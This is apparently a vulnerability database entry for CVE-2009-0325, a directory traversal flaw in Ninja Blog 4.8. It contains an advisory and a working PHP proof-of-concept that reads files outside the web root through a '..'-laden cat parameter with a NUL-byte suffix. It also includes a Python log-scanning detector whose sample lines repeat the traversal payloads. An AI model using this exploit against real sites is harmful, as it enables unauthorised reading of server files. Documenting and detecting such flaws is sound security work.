Ninja Blog index.php Directory Traversal Vulnerability

Vulnerability ID: 1117262; Vulnerability type: Path traversal
Published: 2009-01-19; Updated: 2009-01-29
CVE ID: CVE-2009-0325; CNNVD-ID: CNNVD-200901-421
Platform: PHP; CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/7831
https://cxsecurity.com/issue/WLB-2009020064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-421
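|Vulnerability details
entries/index.php in Ninja Blog 4.8 contains a directory traversal vulnerability. When magic_quotes_gpc is disabled, a remote attacker can read arbitrary files by supplying ".." in the cat parameter.
|Exploit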
Vendor: http://ninjadesigns.co.uk
Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6

----

Due to insufficient validation of client-side data, we can alter the path of files to be read to a file outside the intended directory.

The following PoC will read a file named 'test.txt' one level above the application folder.

---

<?php

$strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read
$strSite = "http://www.example.com/ninjablog4.8/"; //Don't forget the trailing slash

$objCurl = curl_init();
curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead);
curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true);

echo("Getting data...\n");
$strDump = curl_exec($objCurl);

curl_close($objCurl);

echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n");

?>

# milw0rm.com [2009-01-19]
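
A detection sketch for the request pattern described above, added here as an example; it is not part of the original advisory or of Ninja Blog. It scans web access logs for requests to entries/index.php whose cat parameter contains a ".." path segment or a NUL byte after percent-decoding. The log format (combined log format), the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines for illustration; not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jan/2009:10:00:01 +0000] "GET /ninjablog4.8/entries/index.php?cat=news HTTP/1.1" 200 5120
203.0.113.9 - - [19/Jan/2009:10:00:07 +0000] "GET /ninjablog4.8/entries/index.php?cat=../../test.txt%00 HTTP/1.1" 200 312
203.0.113.9 - - [19/Jan/2009:10:00:09 +0000] "GET /ninjablog4.8/entries/index.php?cat=%252e%252e%252ftest.txt HTTP/1.1" 200 0
198.51.100.2 - - [19/Jan/2009:10:01:00 +0000] "GET /ninjablog4.8/index.php?page=2 HTTP/1.1" 200 8000
"""
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_SCRIPT = "entries/index.php"  # script named in the advisory

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_cat(value):
    """Return the reasons a cat value looks like a traversal attempt."""
    decoded = fully_decode(value)
    reasons = []
    if any(seg.strip("\x00") == ".." for seg in re.split(r"[\\/]", decoded)):
        reasons.append("dot-dot segment")
    if "\x00" in decoded:
        reasons.append("NUL byte")
    return reasons

def scan(log_text):
    """Return (client_ip, raw_url, reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        parts = urlsplit(url)
        if not parts.path.endswith(TARGET_SCRIPT):
            continue
        for value in parse_qs(parts.query).get("cat", []):
            reasons = suspicious_cat(value)
            if reasons:
                hits.append((ip, url, reasons))
    return hits

if __name__ == "__main__":
    for ip, url, reasons in scan(SAMPLE_LOG):
        print(ip, url, ", ".join(reasons))
```

A hit with a 200 status and a non-trivial response size is worth prioritising, since it suggests the file read may have succeeded.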
|References

Source: MISC
Link: https://www.push55.co.uk/poclibrary/ninjadesignscouk-1.txt
Source: BID
Name: 33351
Link: http://www.securityfocus.com/bid/33351
Source: MISC
Link: http://www.push55.co.uk/index.php?s=ad&id=6
Source: MILW0RM
Name: 7831
Link: http://www.milw0rm.com/exploits/7831
Source: SECUNIA
Name: 33573
Link: http://secunia.com/advisories/33573